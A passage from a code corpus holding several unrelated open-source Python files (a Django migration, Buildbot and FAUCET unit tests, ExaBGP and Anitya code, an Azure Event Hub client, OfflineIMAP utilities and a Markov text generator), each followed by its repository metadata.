'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'dingos.datatypenamespace': { 'Meta': {'object_name': 'DataTypeNameSpace'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}), 'uri': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.fact': { 'Meta': {'object_name': 'Fact'}, 'fact_term': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTerm']"}), 'fact_values': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.FactValue']", 'null': 'True', 'symmetrical': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'value_iobject_id': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'value_of_set'", 'null': 'True', 'to': u"orm['dingos.Identifier']"}), 'value_iobject_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}) }, u'dingos.factdatatype': { 'Meta': {'unique_together': "(('name', 'namespace'),)", 'object_name': 'FactDataType'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'kind': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_data_type_set'", 'to': u"orm['dingos.DataTypeNameSpace']"}) }, u'dingos.factterm': { 'Meta': {'unique_together': "(('term', 'attribute'),)", 'object_name': 'FactTerm'}, 'attribute': ('django.db.models.fields.CharField', [], {'max_length': '128'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'term': ('django.db.models.fields.CharField', [], {'max_length': '512'}) }, u'dingos.facttermnamespacemap': { 'Meta': {'object_name': 'FactTermNamespaceMap'}, 'fact_term': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTerm']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'namespaces': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.DataTypeNameSpace']", 'through': u"orm['dingos.PositionalNamespace']", 'symmetrical': 'False'}) }, u'dingos.factvalue': { 'Meta': {'unique_together': "(('value', 'fact_data_type', 'storage_location'),)", 'object_name': 'FactValue'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'fact_data_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_value_set'", 'to': u"orm['dingos.FactDataType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'storage_location': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}), 'value': ('django.db.models.fields.TextField', [], {}) }, u'dingos.identifier': { 'Meta': {'unique_together': "(('uid', 'namespace'),)", 'object_name': 'Identifier'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'latest': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'latest_of'", 'unique': 'True', 'null': 'True', 'to': u"orm['dingos.InfoObject']"}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.IdentifierNameSpace']"}), 'uid': ('django.db.models.fields.SlugField', [], {'max_length': '255'}) }, u'dingos.identifiernamespace': { 'Meta': {'object_name': 'IdentifierNameSpace'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_substitution': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}), 'uri': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.infoobject': { 'Meta': {'ordering': "['-timestamp']", 'unique_together': "(('identifier', 'timestamp'),)", 'object_name': 'InfoObject'}, 'create_timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'facts': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['dingos.Fact']", 'through': u"orm['dingos.InfoObject2Fact']", 'symmetrical': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.Identifier']"}), 'iobject_family': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.InfoObjectFamily']"}), 'iobject_family_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['dingos.Revision']"}), 'iobject_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_set'", 'to': u"orm['dingos.InfoObjectType']"}), 'iobject_type_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['dingos.Revision']"}), 'name': ('django.db.models.fields.CharField', [], {'default': "'Unnamed'", 'max_length': '255', 'blank': 'True'}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'uri': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}) }, u'dingos.infoobject2fact': { 'Meta': {'ordering': "['node_id__name']", 'object_name': 'InfoObject2Fact'}, 'attributed_fact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attributes'", 'null': 'True', 'to': u"orm['dingos.InfoObject2Fact']"}), 'fact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_thru'", 'to': u"orm['dingos.Fact']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_thru'", 'to': u"orm['dingos.InfoObject']"}), 'namespace_map': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.FactTermNamespaceMap']", 'null': 'True'}), 'node_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos.NodeID']"}) }, u'dingos.infoobjectfamily': { 'Meta': {'object_name': 'InfoObjectFamily'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '256'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}) }, u'dingos.infoobjecttype': { 'Meta': {'unique_together': "(('name', 'iobject_family', 'namespace'),)", 'object_name': 'InfoObjectType'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject_family': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_type_set'", 'to': u"orm['dingos.InfoObjectFamily']"}), 'name': ('django.db.models.fields.SlugField', [], {'max_length': '30'}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'iobject_type_set'", 'blank': 'True', 'to': u"orm['dingos.DataTypeNameSpace']"}) }, u'dingos.nodeid': { 'Meta': {'object_name': 'NodeID'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos.positionalnamespace': { 'Meta': {'object_name': 'PositionalNamespace'}, 'fact_term_namespace_map': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'namespaces_thru'", 'to': u"orm['dingos.FactTermNamespaceMap']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fact_term_namespace_map_thru'", 'to': u"orm['dingos.DataTypeNameSpace']"}), 'position': ('django.db.models.fields.SmallIntegerField', [], {}) }, u'dingos.revision': { 'Meta': {'object_name': 'Revision'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}) }, u'dingos_authoring.authoreddata': { 'Meta': {'unique_together': "(('group', 'user', 'identifier', 'kind', 'timestamp'),)", 'object_name': 'AuthoredData'}, 'author_view': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos_authoring.AuthorView']", 'blank': 'True'}), 'data': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identifier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['dingos_authoring.Identifier']"}), 'kind': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}), 'processing_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}), 'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, u'dingos_authoring.authorview': { 'Meta': {'object_name': 'AuthorView'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos_authoring.groupnamespacemap': { 'Meta': {'object_name': 'GroupNamespaceMap'}, 'allowed_namespaces': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'authoring_allowed_for'", 'blank': 'True', 'to': u"orm['dingos.IdentifierNameSpace']"}), 'default_namespace': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'authoring_default_for'", 'to': u"orm['dingos.IdentifierNameSpace']"}), 'group': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, u'dingos_authoring.identifier': { 'Meta': {'object_name': 'Identifier'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) }, u'dingos_authoring.infoobject2authoreddata': { 'Meta': {'object_name': 'InfoObject2AuthoredData'}, 'authored_data': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['dingos_authoring.AuthoredData']", 'unique': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'iobject': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'created_from_thru'", 'unique': 'True', 'to': u"orm['dingos.InfoObject']"}) } } complete_apps = ['dingos_authoring']
siemens/django-dingos-authoring
dingos_authoring/south_migrations/0003_auto__add_field_authoreddata_processing_id.py
Python
gpl-2.0
16,713
# This file is part of Buildbot. Buildbot is free software: you can # redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation, version 2. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., 51 # Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # Copyright Buildbot Team Members from twisted.trial import unittest from buildslave.commands import shell from buildslave.test.fake.runprocess import Expect from buildslave.test.util.command import CommandTestMixin class TestSlaveShellCommand(CommandTestMixin, unittest.TestCase): def setUp(self): self.setUpCommand() def tearDown(self): self.tearDownCommand() def test_simple(self): self.make_command(shell.SlaveShellCommand, dict( command=['echo', 'hello'], workdir='workdir', )) self.patch_runprocess( Expect(['echo', 'hello'], self.basedir_workdir) + {'hdr': 'headers'} + {'stdout': 'hello\n'} + {'rc': 0} + 0, ) d = self.run_command() # note that SlaveShellCommand does not add any extra updates of it own def check(_): self.assertUpdates( [{'hdr': 'headers'}, {'stdout': 'hello\n'}, {'rc': 0}], self.builder.show()) d.addCallback(check) return d # TODO: test all functionality that SlaveShellCommand adds atop RunProcess
zozo123/buildbot
slave/buildslave/test/unit/test_commands_shell.py
Python
gpl-3.0
1,818
#!/usr/bin/env python import os import sys import time # When the parent dies we are seeing continual newlines, so we only access so many before stopping counter = 1 # sleep a little bit or we will never see the asm in the configuration file # and the message received just before we go to the established loop will be printed twice time.sleep(1) print 'announce operational rpcq afi ipv4 safi unicast sequence %d' % counter print 'announce operational rpcp afi ipv4 safi unicast sequence %d counter 200' % counter time.sleep(1) counter += 1 print 'announce operational apcq afi ipv4 safi unicast sequence %d' % counter print 'announce operational apcp afi ipv4 safi unicast sequence %d counter 150' % counter time.sleep(1) counter += 1 print 'announce operational lpcq afi ipv4 safi unicast sequence %d' % counter print 'announce operational lpcp afi ipv4 safi unicast sequence %d counter 250' % counter time.sleep(1) while True: try: time.sleep(1) if counter % 2: print 'announce operational adm afi ipv4 safi unicast advisory "this is dynamic message #%d"' % counter sys.stdout.flush() else: print 'announce operational asm afi ipv4 safi unicast advisory "we SHOULD not send asm from the API"' sys.stdout.flush() counter += 1 except KeyboardInterrupt: pass except IOError: break
benagricola/exabgp
qa/self/operational/operational-send.py
Python
bsd-3-clause
1,319
# -*- coding: utf-8 -*- """ (c) 2014 - Copyright Red Hat Inc Authors: Pierre-Yves Chibon <[email protected]> """ from anitya.lib.backends import ( BaseBackend, get_versions_by_regex_for_text, REGEX) from anitya.lib.exceptions import AnityaPluginException import six DEFAULT_REGEX = 'href="([0-9][0-9.]*)/"' class FolderBackend(BaseBackend): ''' The custom class for project having a special hosting. This backend allows to specify a version_url and a regex that will be used to retrieve the version information. ''' name = 'folder' examples = [ 'http://ftp.gnu.org/pub/gnu/gnash/', 'http://subsurface.hohndel.org/downloads/', ] @classmethod def get_version(cls, project): ''' Method called to retrieve the latest version of the projects provided, project that relies on the backend of this plugin. :arg Project project: a :class:`model.Project` object whose backend corresponds to the current plugin. :return: the latest version found upstream :return type: str :raise AnityaPluginException: a :class:`anitya.lib.exceptions.AnityaPluginException` exception when the version cannot be retrieved correctly ''' return cls.get_ordered_versions(project)[-1] @classmethod def get_versions(cls, project): ''' Method called to retrieve all the versions (that can be found) of the projects provided, project that relies on the backend of this plugin. :arg Project project: a :class:`model.Project` object whose backend corresponds to the current plugin. :return: a list of all the possible releases found :return type: list :raise AnityaPluginException: a :class:`anitya.lib.exceptions.AnityaPluginException` exception when the versions cannot be retrieved correctly ''' url = project.version_url try: req = cls.call_url(url, insecure=project.insecure) except Exception as err: raise AnityaPluginException( 'Could not call : "%s" of "%s", with error: %s' % ( url, project.name, str(err))) versions = None if not isinstance(req, six.string_types): req = req.text try: regex = REGEX % {'name': project.name.replace('+', '\+')} versions = get_versions_by_regex_for_text( req, url, regex, project) except AnityaPluginException: versions = get_versions_by_regex_for_text( req, url, DEFAULT_REGEX, project) return versions
pombredanne/anitya
anitya/lib/backends/folder.py
Python
gpl-2.0
2,702
"""File for Azure Event Hub models.""" from __future__ import annotations from dataclasses import dataclass import logging from azure.eventhub.aio import EventHubProducerClient, EventHubSharedKeyCredential from .const import ADDITIONAL_ARGS, CONF_EVENT_HUB_CON_STRING _LOGGER = logging.getLogger(__name__) @dataclass class AzureEventHubClient: """Class for the Azure Event Hub client. Use from_input to initialize.""" event_hub_instance_name: str @property def client(self) -> EventHubProducerClient: """Return the client.""" async def test_connection(self) -> None: """Test connection, will throw EventHubError when it cannot connect.""" async with self.client as client: await client.get_eventhub_properties() @classmethod def from_input(cls, **kwargs) -> AzureEventHubClient: """Create the right class.""" if CONF_EVENT_HUB_CON_STRING in kwargs: return AzureEventHubClientConnectionString(**kwargs) return AzureEventHubClientSAS(**kwargs) @dataclass class AzureEventHubClientConnectionString(AzureEventHubClient): """Class for Connection String based Azure Event Hub Client.""" event_hub_connection_string: str @property def client(self) -> EventHubProducerClient: """Return the client.""" return EventHubProducerClient.from_connection_string( conn_str=self.event_hub_connection_string, eventhub_name=self.event_hub_instance_name, **ADDITIONAL_ARGS, ) @dataclass class AzureEventHubClientSAS(AzureEventHubClient): """Class for SAS based Azure Event Hub Client.""" event_hub_namespace: str event_hub_sas_policy: str event_hub_sas_key: str @property def client(self) -> EventHubProducerClient: """Get a Event Producer Client.""" return EventHubProducerClient( fully_qualified_namespace=f"{self.event_hub_namespace}.servicebus.windows.net", eventhub_name=self.event_hub_instance_name, credential=EventHubSharedKeyCredential( # type: ignore[arg-type] policy=self.event_hub_sas_policy, key=self.event_hub_sas_key ), **ADDITIONAL_ARGS, )
rohitranjan1991/home-assistant
homeassistant/components/azure_event_hub/client.py
Python
mit
2,254
# IMAP utility module # Copyright (C) 2002 John Goerzen # <[email protected]> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import re import string import types from offlineimap.ui import getglobalui try: # python 2.6 has set() built in set except NameError: from sets import Set as set quotere = re.compile('^("(?:[^"]|\\\\")*")') def debug(*args): msg = [] for arg in args: msg.append(str(arg)) getglobalui().debug('imap', " ".join(msg)) def dequote(string): """Takes a string which may or may not be quoted and returns it, unquoted. This function does NOT consider parenthised lists to be quoted. """ if not (string[0] == '"' and string[-1] == '"'): return string string = string[1:-1] # Strip off quotes. string = string.replace('\\"', '"') string = string.replace('\\\\', '\\') debug("dequote() returning:", string) return string def flagsplit(string): """Converts a string of IMAP flags to a list :returns: E.g. '(\\Draft \\Deleted)' returns ['\\Draft','\\Deleted']. (FLAGS (\\Seen Old) UID 4807) returns ['FLAGS,'(\\Seen Old)','UID', '4807'] """ if string[0] != '(' or string[-1] != ')': raise ValueError, "Passed string '%s' is not a flag list" % string return imapsplit(string[1:-1]) def options2hash(list): """convert list [1,2,3,4,5,6] to {1:2, 3:4, 5:6}""" # effectively this does dict(zip(l[::2],l[1::2])), however # measurements seemed to have indicated that the manual variant is # faster for mosly small lists. retval = {} counter = 0 while (counter < len(list)): retval[list[counter]] = list[counter + 1] counter += 2 debug("options2hash returning:", retval) return retval def flags2hash(flags): """Converts IMAP response string from eg IMAP4.fetch() to a hash. E.g. '(FLAGS (\\Seen Old) UID 4807)' leads to {'FLAGS': '(\\Seen Old)', 'UID': '4807'}""" return options2hash(flagsplit(flags)) def imapsplit(imapstring): """Takes a string from an IMAP conversation and returns a list containing its components. One example string is: (\\HasNoChildren) "." "INBOX.Sent" The result from parsing this will be: ['(\\HasNoChildren)', '"."', '"INBOX.Sent"']""" if type(imapstring) != types.StringType: debug("imapsplit() got a non-string input; working around.") # Sometimes, imaplib will throw us a tuple if the input # contains a literal. See Python bug # #619732 at https://sourceforge.net/tracker/index.php?func=detail&aid=619732&group_id=5470&atid=105470 # One example is: # result[0] = '() "\\\\" Admin' # result[1] = ('() "\\\\" {19}', 'Folder\\2') # # This function will effectively get result[0] or result[1], so # if we get the result[1] version, we need to parse apart the tuple # and figure out what to do with it. Each even-numbered # part of it should end with the {} number, and each odd-numbered # part should be directly a part of the result. We'll # artificially quote it to help out. retval = [] for i in range(len(imapstring)): if i % 2: # Odd: quote then append. arg = imapstring[i] # Quote code lifted from imaplib arg = arg.replace('\\', '\\\\') arg = arg.replace('"', '\\"') arg = '"%s"' % arg debug("imapsplit() non-string [%d]: Appending %s" %\ (i, arg)) retval.append(arg) else: # Even -- we have a string that ends with a literal # size specifier. We need to strip off that, then run # what remains through the regular imapsplit parser. # Recursion to the rescue. arg = imapstring[i] arg = re.sub('\{\d+\}$', '', arg) debug("imapsplit() non-string [%d]: Feeding %s to recursion" %\ (i, arg)) retval.extend(imapsplit(arg)) debug("imapsplit() non-string: returning %s" % str(retval)) return retval workstr = imapstring.strip() retval = [] while len(workstr): if workstr[0] == '(': rparenc = 1 # count of right parenthesis to match rpareni = 1 # position to examine while rparenc: # Find the end of the group. if workstr[rpareni] == ')': # end of a group rparenc -= 1 elif workstr[rpareni] == '(': # start of a group rparenc += 1 rpareni += 1 # Move to next character. parenlist = workstr[0:rpareni] workstr = workstr[rpareni:].lstrip() retval.append(parenlist) elif workstr[0] == '"': quotelist = quotere.search(workstr).group(1) workstr = workstr[len(quotelist):].lstrip() retval.append(quotelist) else: splits = string.split(workstr, maxsplit = 1) splitslen = len(splits) # The unquoted word is splits[0]; the remainder is splits[1] if splitslen == 2: # There's an unquoted word, and more string follows. retval.append(splits[0]) workstr = splits[1] # split will have already lstripped it continue elif splitslen == 1: # We got a last unquoted word, but nothing else retval.append(splits[0]) # Nothing remains. workstr would be '' break elif splitslen == 0: # There was not even an unquoted word. break return retval flagmap = [('\\Seen', 'S'), ('\\Answered', 'R'), ('\\Flagged', 'F'), ('\\Deleted', 'T'), ('\\Draft', 'D')] def flagsimap2maildir(flagstring): """Convert string '(\\Draft \\Deleted)' into a flags set(DR)""" retval = set() imapflaglist = flagstring[1:-1].split() for imapflag, maildirflag in flagmap: if imapflag in imapflaglist: retval.add(maildirflag) return retval def flagsmaildir2imap(maildirflaglist): """Convert set of flags ([DR]) into a string '(\\Draft \\Deleted)'""" retval = [] for imapflag, maildirflag in flagmap: if maildirflag in maildirflaglist: retval.append(imapflag) retval.sort() return '(' + ' '.join(retval) + ')' def uid_sequence(uidlist): """Collapse UID lists into shorter sequence sets [1,2,3,4,5,10,12,13] will return "1:5,10,12:13". This function sorts the list, and only collapses if subsequent entries form a range. :returns: The collapsed UID list as string""" def getrange(start, end): if start == end: return(str(start)) return "%s:%s" % (start, end) if not len(uidlist): return '' # Empty list, return start, end = None, None retval = [] # Force items to be longs and sort them sorted_uids = sorted(map(int, uidlist)) for item in iter(sorted_uids): item = int(item) if start == None: # First item start, end = item, item elif item == end + 1: # Next item in a range end = item else: # Starting a new range retval.append(getrange(start, end)) start, end = item, item retval.append(getrange(start, end)) # Add final range/item return ",".join(retval)
rayners/offlineimap
offlineimap/imaputil.py
Python
gpl-2.0
8,280
#!/usr/bin/env python from markovLatex.markov import TextGenerator from markovLatex.tex import Document as doc from random import randint import argparse, sys def main(args): parser = argparse.ArgumentParser(description="Access the Will of the Gods from the command line.") parser.add_argument('files', type=str, nargs='+', help='one or more input text files') parser.add_argument('-c','--chapters', type=int, help='The number of chapters in the output text') args = parser.parse_args(args) corpus = [] for arg in args.files: try: corpus.append(open(arg, 'r')) except Exception as e: print(e) if corpus: try: d = doc(r'../output/output.tex') textGen = TextGenerator(corpus) title = textGen.title() print('\nBEHOLD:\n\n') print('THE GODS HAVE SMILED UPON US THIS DAY\n\n') print('THEY PASS ON TO YOU THIS HOLY TEXT:\n\n') print(title + '\n\n') print('SPREAD ITS MIGHTY WORD THROUGHOUT THE LAND') d.begin(title) for i in range(0, args.chapters or randint(10,20)): d.write_chapter(textGen.title(),textGen.chapter()) d.compile() except Exception as e: print(e) return 1 return 0 if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
SeanMcGrath/MarkovLatex
biblegen.py
Python
mit
1,204
#!/usr/bin/env python3 """Unit tests run as PYTHONPATH=../../.. python3 ./test_valve.py.""" # pylint: disable=too-many-lines # Copyright (C) 2015 Research and Innovation Advanced Network New Zealand Ltd. # Copyright (C) 2015--2019 The Contributors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from functools import partial import copy import hashlib import unittest import time from os_ken.ofproto import ofproto_v1_3 as ofp from faucet import config_parser_util from faucet import valve_of from clib.fakeoftable import CONTROLLER_PORT from clib.valve_test_lib import BASE_DP1_CONFIG, CONFIG, DP1_CONFIG, FAUCET_MAC, ValveTestBases class ValveIncludeTestCase(ValveTestBases.ValveTestNetwork): """Test include optional files.""" CONFIG = """ include-optional: ['/does/not/exist/'] dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup config with non-existent optional include file""" self.setup_valves(self.CONFIG) def test_include_optional(self): """Test include optional files.""" self.assertEqual(1, int(self.get_prom('dp_status'))) class ValveBadConfTestCase(ValveTestBases.ValveTestNetwork): """Test recovery from a bad config file.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG BAD_CONFIG = """ dps: {} """ def setUp(self): """Setup invalid config""" self.setup_valves(self.CONFIG) def test_bad_conf(self): """Test various config types & config reloading""" for config, load_error in ( (self.CONFIG, 0), (self.BAD_CONFIG, 1), (self.CONFIG, 0), (self.MORE_CONFIG, 0), (self.BAD_CONFIG, 1), (self.CONFIG, 0)): with open(self.config_file, 'w', encoding='utf-8') as config_file: config_file.write(config) self.valves_manager.request_reload_configs(self.mock_time(), self.config_file) self.assertEqual( load_error, self.get_prom('faucet_config_load_error', bare=True), msg='%u: %s' % (load_error, config)) class ValveChangePortTestCase(ValveTestBases.ValveTestNetwork): """Test changes to config on ports.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x200 permanent_learn: True """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x200 permanent_learn: False """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_delete_permanent_learn(self): """Test port permanent learn can deconfigured.""" table = self.network.tables[self.DP_ID] before_table_state = table.table_state() self.rcv_packet(2, 0x200, { 'eth_src': self.P2_V200_MAC, 'eth_dst': self.P3_V200_MAC, 'ipv4_src': '10.0.0.2', 'ipv4_dst': '10.0.0.3', 'vid': 0x200}) self.update_and_revert_config( self.CONFIG, self.LESS_CONFIG, 'warm', before_table_states={self.DP_ID: before_table_state}) class ValveDeletePortTestCase(ValveTestBases.ValveTestNetwork): """Test deletion of a port.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_port_delete(self): """Test port can be deleted.""" self.update_and_revert_config(self.CONFIG, self.LESS_CONFIG, 'cold') class ValveAddPortMirrorNoDelVLANTestCase(ValveTestBases.ValveTestNetwork): """Test addition of port mirroring does not cause a del VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 output_only: true """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 output_only: true mirror: [1] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" _ = self.setup_valves(self.CONFIG)[self.DP_ID] def test_port_mirror(self): """Test addition of port mirroring is a warm start.""" _ = self.update_config(self.MORE_CONFIG, reload_type='warm')[self.DP_ID] class ValveAddPortTestCase(ValveTestBases.ValveTestNetwork): """Test addition of a port.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ % DP1_CONFIG @staticmethod def _inport_flows(in_port, ofmsgs): return [ ofmsg for ofmsg in ValveTestBases.flowmods_from_flows(ofmsgs) if ofmsg.match.get('in_port') == in_port] def setUp(self): """Setup basic port and vlan config""" initial_ofmsgs = self.setup_valves(self.CONFIG)[self.DP_ID] self.assertFalse(self._inport_flows(3, initial_ofmsgs)) def test_port_add(self): """Test port can be added.""" reload_ofmsgs = self.update_config(self.MORE_CONFIG, reload_type='cold')[self.DP_ID] self.assertTrue(self._inport_flows(3, reload_ofmsgs)) class 